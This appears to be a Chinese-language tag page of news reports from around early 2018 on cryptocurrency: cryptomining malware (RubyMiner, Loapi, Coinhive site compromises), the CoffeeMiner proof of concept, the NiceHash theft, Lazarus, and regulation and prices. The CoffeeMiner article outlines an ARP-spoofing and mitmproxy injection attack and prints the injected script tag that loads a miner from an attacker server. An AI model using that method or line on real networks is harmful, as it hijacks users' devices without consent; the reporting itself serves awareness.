标签: 加密货币

RubyMiner 恶意软件入侵过时服务器挖掘加密货币

安全研究人员近期观察到一种在线部署的新型恶意软件 RubyMiner ——这是一种在被遗忘的网络服务器上发现的加密货币矿工 。据 Check Point 和 Certego 发布的研究结果以及研究员从 Ixia 收到的信息表明,攻击事件始于上周 1 月 9 日至 10 日。 攻击 Linux 和 Windows 服务器 Ixia 安全研究员 Stefan Tanase 指出,RubyMiner 的目标是 Windows 和 Linux 系统。恶意软件 RubyMiner 背后的团队使用一个名为 p0f 的 web 服务器指纹工具来扫描和识别运行过时软件的 Linux 和 Windows 服务器。一旦识别到未打补丁的服务器,攻击者就可以将已知的漏洞部署在易受攻击的服务器上,然后用 RubyMiner 来感染他们。 Check Point 和 Ixia 表示,他们已经观察到攻击者在最近的攻击浪潮中部署了以下漏洞: ◍ Ruby on Rails XML处理器 YAML 反序列化代码执行(CVE-2013-0156) ◍ PHP php-cgi 查询字符串参数代码执行(CVE-2012-1823;CVE-2012-2311; CVE-2012-2335;CVE -2012-2336;CVE-2013-4878) ◍ 微软 IIS ASP 脚本的源代码泄露(CVE-2005-2678 ) 攻击者将恶意代码隐藏在 robots.txt 文件中 在上周发布的一份报告中,Check Point 根据从 honeypot 服务器收集的数据,在 Linux 系统上分解了 RubyMiner 的感染例程,并从中认识到攻击者在某些方面的创造力: ▨ 可利用代码包含了一系列 shell 命令 ▨ 攻击者清除了所有的 cron 作业 ▨ 攻击者添加了一个新的计时 cron 作业 ▨ 新的 cron 作业下载了在线托管的脚本 ▨ 该脚本托管在多个域的 robots.txt 文件内 ▨ 脚本下载并安装合法的 XMRig Monero 矿工应用程序修改版本。 Check Point 安全研究员 Lotem Finkelstein 则表示,目前攻击者瞄准了 Windows IIS 服务器,但是并没有获得 RubyMiner 的 Windows 版本副本。此外 ,Check Point 称 2103 年的一起恶意软件活动部署了与 RubyMiner 相同的 Ruby on Rails 漏洞, Check Point 猜测其背后团队很可能正试图扩展 RubyMiner 。 Monero 采矿恶意软件的发展趋势日益明显 总体而言,近几个月来传播加密货币挖掘恶意软件的尝试有所增加,尤其是挖掘 Monero 的恶意软件。 除了密码劫持事件(也是 Monero )之外,2017 年的一些 Monero 挖掘恶意软件家族和僵尸网络还包括 Digmine、针对 WordPress 网站的未知僵尸网络、Hexmen、Loapi、Zealot、aterMiner、 针对 IIS 6.0 服务器的未知僵尸网络、CodeFork 以及 Bondnet 等。而就在 2018 年的前两个星期,已经出现了针对 Linux 服务器的 PyCryptoMiner 和另外一个针对 Oracle WebLogic 服务器的组织。大多数针对 Web 服务器的事件中,研究人员发现攻击者试图使用最近的漏洞攻击,因为会有更多易感染的机器。但奇怪的是,RubyMiner 攻击者却使用非常古老的漏洞,并且大多数安全软件都能检测到这些漏洞。 据研究员 Finkelstein 透露,RubyMiner 攻击者可能是故意寻找被遗弃的机器,比如被遗忘的个人电脑和带有旧操作系统的服务器 ,感染设备后确保在安全雷达下进行长时间的采矿。 RubyMiner 团伙已感染 700 多台服务器 根据 RubyMiner 恶意软件部署的自定义 XMRig 矿工中发现的钱包地址,Check Point 初步统计受到 RubyMiner 感染的服务器数量在 700 个左右,攻击者的收入约为  540  美元。一些专家认为若攻击者开始使用最近的漏洞,其幕后团队可能会赚取更多的钱。例如,一个从 2017 年 10 月开始针对 Oracle WebLogic 服务器的黑客组织就曾获利 226,000 美元 。 消息来源:Bleeping Computer,编译:榆榆,校审:FOX; 本文由 HackerNews.cc 编译整理,封面来源于网络; 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

德国央行主管:监管比特币必须全球联手

媒体 1 月 16 日上午消息,德国中央银行一名主管本周一表示,如果想监管加密货币(比如比特币),必须全球统一行动,因为国家或者区域法规很难在无边界虚拟社区推行。比特币与加密货币交易突然爆发,全球——特别是亚洲——各国的监管机构踩下 “ 刹车 ”,试图遏制交易。 不过德国联邦银行( Bundesbank,即德国的央行)董事会成员约阿希姆·武勒梅林( Joachim Wuermeling )认为,加密货币交易已是全球化现象,想用国家规定来控制可能很难。 武勒梅林说:“只有尽最大可能展开国际合作,才能对虚拟货币进行有效监管,因为国家的监管权力存在局限性。” 中国已经禁止 ICO ,关闭了本国的加密货币交易所,限制比特币采矿,尽管如此,各种活动还是借助其它替代渠道继续进行。在韩国,投机交易仍然盛行,韩国正在制定政策,准备禁止虚拟货币交易。 上个月,欧盟成员国和立法者达成一致,决定加大监管力度,打击洗钱和恐怖主义融资活动,这些活动往往通过交易平台以比特币及其它虚拟货币的形式来进行。 稿源:cnBeta、新浪科技,封面源自网络;

新型 CoffeeMiner 攻击:劫持公共 Wi-Fi 用户设备秘密挖掘门罗币

据外媒 1 月 6 日报道,开发商 Arnau 发布了一个名为 CoffeeMiner 的概念证明项目,展示了攻击者如何利用公共 Wi-Fi 网络来挖掘加密货币。 加密货币的价格上涨使其一直受到网络攻击者的青睐。不久前,黑客就瞄准了星巴克里 “ 蹭网 ” 的笔记本,将其变成了自己的矿机疯狂挖掘门罗币(与比特币类似的一种加密货币)。 Arnau 专家受到了星巴克案件的启发,破解公共 Wi-Fi 网络,将加密挖掘代码注入到连接的浏览会话中,迫使连入 公共 Wi-Fi 网络的所有设备秘密挖掘加密货币。 Arnau 解释了如何在连接的用户访问的 html 页面中为 MITM (中间人)攻击注入一些 javascript ,这样做所有连接到 WiFi 网络的设备都可以强制成为 Arnau 的加密货币。 Arnau 专家分享 CoffeeMiner 攻击方式: 通过欺骗局域网上的地址解析协议(ARP)消息拦截网络上其他设备的未加密传输。 使用 Mitmproxy 将 JavaScript 注入到 Wi-Fi 用户访问的页面中。 为了保证过程简洁,开发人员只注入了一行调用加密货币矿工的代码。 <script src="http://httpserverIP:8000/script.js" type="text/javascript"></script> 然后,通过一个 HTTP 服务器服务该挖掘器。当用户的浏览器加载带有注入代码的页面时,运行 JavaScript 滥用 CPU 时间,并使用 CoinHive 加密挖掘软件挖掘 Monero 。 一旦编译完成,这些元素就会成为一个单独的脚本,可以由攻击者在公共 Wi-Fi 网络上部署。不知情的用户通过由攻击者控制的服务器重新路由,导致其设备在浏览时挖掘加密货币。 目前研究人员发布的 CoffeeMiner 版本尚不支持 HTTPS,但是可以通过添加 sslstrip 来绕过限制。 相关阅读: 研究人员发布的 CoffeeMiner 攻击演示视频  Arnau 在GitHub上发布的 CoffeeMiner 项目代码 消息来源:Security Affairs、Zdnet,编译:榆榆,校审:FOX; 本文由 HackerNews.cc 编译整理,封面来源于网络; 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

黑莓手机官网感染 Coinhive 虚拟货币挖矿脚本

外媒 1 月 9 日消息, 一位绰号为 “ Rundvleeskroket ” 的 Reddit 用户于 6 日声称黑莓手机官网(blackberrymobile.com)被攻击者利用,通过 Coinhive 货币挖矿工具挖掘 Monero(门罗币) 。根据 Coinhive 的说法该网站遭入侵是因为 Magento 电子商务软件存在安全漏洞。 调查显示,似乎只有全球网站受到 coinhive 挖矿工具的影响,其加拿大、欧盟、美国等地区的用户不在涉及范围内。 Reddit 用户分享的屏幕截图 目前黑莓手机官网已删除了 Coinhive 工具代码,但此类事件愈演愈烈情形不容乐观: 去年 11 月份,专家报告称相同的攻击者加载伪装成假 jQuery 和 Google Analytics JavaScript 文件的恶意脚本,这些文件实际上是 Coinhive 浏览器内加密货币矿工的副本。截至 11 月 22 日,据专家统计共有 1,833 个网站被攻击。 12 月份,Sucuri 的专家发现近 5,500 个 WordPress 网站感染恶意脚本。研究显示该恶意脚本能够记录击键信息,并在访问者的浏览器中加载了一个秘密工作的虚拟货币挖矿工具。同月,星巴克某店 Wifi 被爆遭黑客利用蹭网用户电脑进行挖矿。 Coinhive 工具官方在发现了同一个 Coinhive 帐户被许多其他网站所使用后,对该账户进行了封禁操作。此外,Coinhive 因其服务被滥用向用户表达了歉意。 消息来源:Security Affairs,编译:榆榆,校审:FOX; 本文由 HackerNews.cc 编译整理,封面来源于网络; 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

挖矿网站 NiceHash 被黑后续:创始人辞去 CEO 职务

12 月上旬的时候,加密货币挖矿网站 NiceHash 曝出了黑客入侵事件,结果导致当时价值将近 6400 万美元的比特币失窃、以及网站关停 24 小时。该网站允许用户利用其闲置的 GPU 运算资源来挖掘加密货币,但本次攻击破坏了其支付系统、并清空了它的比特币钱包。虽然创始人次日就在 Facebook 上直播道歉,但这显然无法平息众人的愤怒。最新消息是,由于 Marko Kobal 愧对了大家的信任,所以 NiceHash 任命了一位新的 CEO。 Kobal 曾在领英上发表了一份声明,称该公司在努力恢复,同时透露公司可以在新管理层的领导下继续运营下去。 据斯洛文尼亚《劳动报》(Delo)报道,Zdravko Poljasevic 将接替公司首席执行官(CEO)的职务。 至于与 Kobal 共同创立 NiceHash 的 Matjaz Skorjanc ,则会继续担任首席技术官(CTO)的职务。 稿源:新浪科技;封面源自网络;

瑞波币市值超越以太币 成第二大加密货币

据媒体 1 月 1 日报道,瑞波币(ripple)交易价格在上周五暴涨近 56 % ,创历史新高,市值一举超越以太币,成为第二大加密货币。 根据数字资产信息平台 CoinMarketCap 的数据,瑞波币价格在上周五下午大涨 55.9 %,达到创纪录的 2.23 美元。 CoinMarketCap 的数据显示,瑞波币的市值因此达到 863 亿美元,超过了以太币 730 亿美元的市值。早些时候,随着加密货币价格在早间交易中出现波动,瑞波币和以太币为争夺第二名的宝座展开了激烈较量。 根据 CoinMarketCap 的数据,到目前为止,比特币仍然是第一大数字货币,当前市值约为 2470 亿美元,在加密货币总市值的占比约为 41 %,瑞波币的占比约为 12.5 %,而以太币的占比约为 12.1 %。 六大市值最高加密货币 CoinMarketCap 的数据显示,瑞波币的市值曾在今年 5 月份超越以太币,成为第二大加密货币,但随后瑞波币的价格出现暴跌,只剩下 36 美分左右。瑞波币的交易价格最终在上上周突破 1 美元,在上周五下午突破 2 美元,进入 2017 年以来价格已累计上涨逾 34,700 %。 CoinMarketCap 的数据显示,以太币的价格在上周五下午上涨约 2 % 至 753.57 美元,市值约为 728 亿美元。另一家虚拟货币信息平台 Coinbase 的数据显示,比特币的交易价格当天也出现小幅上涨,接近 14,475 美元。 稿源:新浪科技;封面源自网络;

来自金钱的诱惑:Lazarus APT 魔爪逐渐伸向加密货币

安全公司 Proofpoint 近日发现 Lazarus APT 组织对加密货币极为关注, 并试图利用公众、媒体对加密货币价格暴涨的浓厚兴趣展开攻击。因此 Proofpoint 推断 Lazarus 的攻击行动可能与经济利益挂钩。 Lazarus(音译 “ 拉撒路 ”)堪称全球金融机构首要威胁。该组织自 2009 年以来一直处于活跃状态,据推测早在 2007 年就已涉足摧毁数据及破坏系统的网络间谍活动。调查显示,黑客组织 Lazarus 与 2014 年索尼影业遭黑客攻击事件及 2016 年孟加拉国银行数据泄露事件有关。(编者注) Proofpoint 发现 Lazarus 的攻击行动有一些共同特性: 第一、朝鲜黑客发起的几个多阶段的攻击都使用了与加密货币有关联的恶意软件来感染用户。 第二,包括 Gh0st RAT 在内的其他恶意软件,都旨在窃取加密货币钱包和交易的凭证,使 Lazarus 组织能够利用比特币和其他加密货币进行有利可图的操作。 因此 Proofpoint 推测 Lazarus 所进行的间谍活动极有可能是出于经济原因(这些行动或是朝鲜特有的),但此前已有多家安全公司认定 Lazarus APT是由国家资助的间谍组织,而国家支持的组织通常又会进行间谍活动和制造混乱。因此研究 Lazarus 的这些行动变得具有探索意义,有趣的地方在于: ○ Lazarus  APT 似乎是被公开的由国家资助以获取经济利益的第一个黑客组织组织 ○ 这些针对加密货币的攻击行动也有利于研究人员记录 Lazarus APT 所使用的定制工具和程序。 ○ 通过这些行动可以推断 Lazarus 并不是一个针对个体的单纯组织。 ○ 可以更好地了解 Lazarus 的行动和其所代表的全球威胁 消息来源: Security Affairs ,编译:榆榆,校审:FOX 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

韩国 FTC 对 13 家数字加密货币交易所展开调查

韩国反垄断机构 “ 联邦贸易委员会 ” (以下简称 “ FTC ” )今日宣布,已对 13 家主要的数字加密货币交易所进行了调查,以评估它们是否违反了消费者保护法。这些被调查的交易所包括 Bithumb、Coinone 和 Korbit 等,FTC 将考虑是继续将这些交易所归类为 “ 在线零售业务 ” ,还是归类为其他不同的业务,以强化监管。 此外,FTC 还将评估这些交易所制定的各种条款是否存在不公平性。 此次调查为期三天,基于调查结果,韩国 FTC 将采取相应的措施来监管这些交易所。本月早些时候,韩国政府召开多部门联合紧急会议,决定采取多项措施遏制虚拟货币市场投机和犯罪活动。 会议决定,将禁止未成年人开设账户和交易虚拟货币,禁止金融机构持有、购买虚拟货币或以虚拟货币投资;在进行与虚拟货币投资相关的银行转账业务时,要求本人确认等。 此外,韩国政府还计划推进立法,保护投资者并增强虚拟货币交易透明度;探讨设立虚拟货币交易所的相关安全监管措施;明确界定与代币融资 ( ICO ) 相关的违禁行为,并严惩违禁行为。另外,韩国政府还将设立工作组,讨论是否对虚拟货币交易收益征税。 在此之前,韩国数字加密货币交易所 Youbit 刚刚发布公告称,由于今年已第二次遭黑客入侵,丢失了数字钱包,公司将申请破产,所有现金和数字货币的结算将按照所有破产程序进行。 之前,Youbit 就被归类为 “ 在线零售业务 ” 。而业内观察表示,经过此次调查,FTC 将来可能把这些交易所归类为 “ 金融机构 ”,在安全和消费者保护方面将面临更严格的监管。 稿源:cnBeta、新浪科技,封面源自网络;编辑:榆榆

木马界一朵“奇葩”:伪装多款杀毒、色情 APP,挖矿挖到手机“炸裂”

卡巴斯基实验室本周一( 12 月 18 日)发布博文表示,发现一种名为 Loapi 的功能强大的木马病毒,其具备多重攻击手段、能够利用被感染设备挖掘加密货币、发起 DDos 攻击等,甚至于对存在该木马病毒智能手机也会造成物理损坏——使感染病毒时间超过两天的手机电池膨胀。   伪装成杀毒软件和色情应用程序感染设备 研究人员介绍,恶意开发人员利用 Loapi  挖掘加密货币、用固定广告骚扰用户、启动拒绝服务 ( DoS ) 网络攻击、访问文本消息并连接到网络。当用户被重定向到攻击者的恶意网络资源后,会自动下载恶意文件。据悉,存在  Loapi  的恶意软件可以伪装成至少 20 种不同的杀毒软件和色情应用程序去感染用户设备。 在用户安装假冒的应用程序的过程中,应用程序会尝试获取设备管理员权限, 通过循环弹框直到用户同意授权为止。随后,Loapi 将其图标隐藏在菜单中或模拟各种防病毒活动,试图让用户相信该应用程序是合法的。而具体的行为特征则取决于它所伪装成的应用程序类型,如下图: 具备强大的自我保护机制 研究发现,木马病毒 Loapi 能够积极地对抗任何想要撤销设备管理权限的企图,每当用户试图取消这些权限时,恶意应用程序将会锁定屏幕并使用设备管理器设置关闭窗口,并执行以下代码: 同时该木马还能够从其 C&C 服务器接收一个危险的应用程序列表用于监听某些应用程序的安装和启动, 例如当木马 Loapi 检测到一个真正的反病毒应用程序,它会谎称其是恶意软件,并循环弹框迫使用户卸载该反病毒应用程序。 开采 Monero (门罗币) 导致手机电池膨胀 根据卡巴斯基实验室的说法,木马 Loapi 具备挖掘加密货币的功能,能够利用被感染设备的计算资源挖掘数字货币 Monero(门罗币),也正是这种功能甚至导致了设备电池膨胀,以至于对手机造成物理损害。 据研究人员介绍,Loapi 似乎是 2015 年发现的一个 “ Podec ” 木马的新版本,堪称恶意 Android 应用程序界中的一朵  “ 奇葩 ”。  感染木马病毒后的手机设备,两天后出现电池膨胀现象 Loapi 的开发者几乎用上了我们能够想到的所有手段对攻击设备进行攻击:该木马可以使用户订阅付费服务、任意发送短信、产生流量并通过展示广告赚钱、利用设备的计算能力来挖掘加密货币、并在互联网上进行各种活动。目前唯一缺少的行为就是 “ 间谍活动 ”,但是此类木马专业且模块化的体系结构意味着它随时都能添加这种功能。 所幸,目前 Loapi 被发现只潜伏于第三方应用商店 ,尚未出现在 Google App Store 中。但即使是在官方商店下载应用程序,用户也需时刻保持警惕,因为恶意软件随时可能会出现各种木马漏洞。 消息来源: IBTimes、securelist,编译:榆榆,校审:FOX 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

加密货币概念有多火?2014 年以来有 64 亿美金热钱涌向 ICO

最近一年,我们已经屡次听闻与 “令牌销售”(token sale)和 “首次代币发行”(ICO)相关的报道,这也从侧面反映了加密数字货币的受追捧程度。尽管期间不时有交易所被黑客攻击或跑路的负面事件发生,矿工们对它的热情依然没有太多的消减。自 2014 年以来,加密货币初创企业 Elementus 成功募集到至少 10 万美元的令牌销售事件。此外基于月度数据,图表也可以展示这些 ICO 的整体现金流向。 由图表可知,该行业前三年的发展相对缓慢,但在 2017 年 5 月份迎来了爆发。在此期间,差不多有几十个 ICO 项目在并行启动,从狂热者和投资者手中轻松拿到了数百万美元的资金。 在比特币和以太坊的带动下,基于区块链技术的加密货币市场迎来了爆发式增长。Elementus 创始人兼 UPenn 兼职讲师 Max Galka 写到:我们对可找到的每一个令牌(token)、众销(crowdsale)和多重签名钱包(multisig wallet)进行了搜索,然后识别出相应的所有者、对他们贡献的资金总额进行了计算。数据要么来自区块链本身,要么就来自筹款人发布的报告。 稿源:cnBeta,封面源自网络;编辑:青楚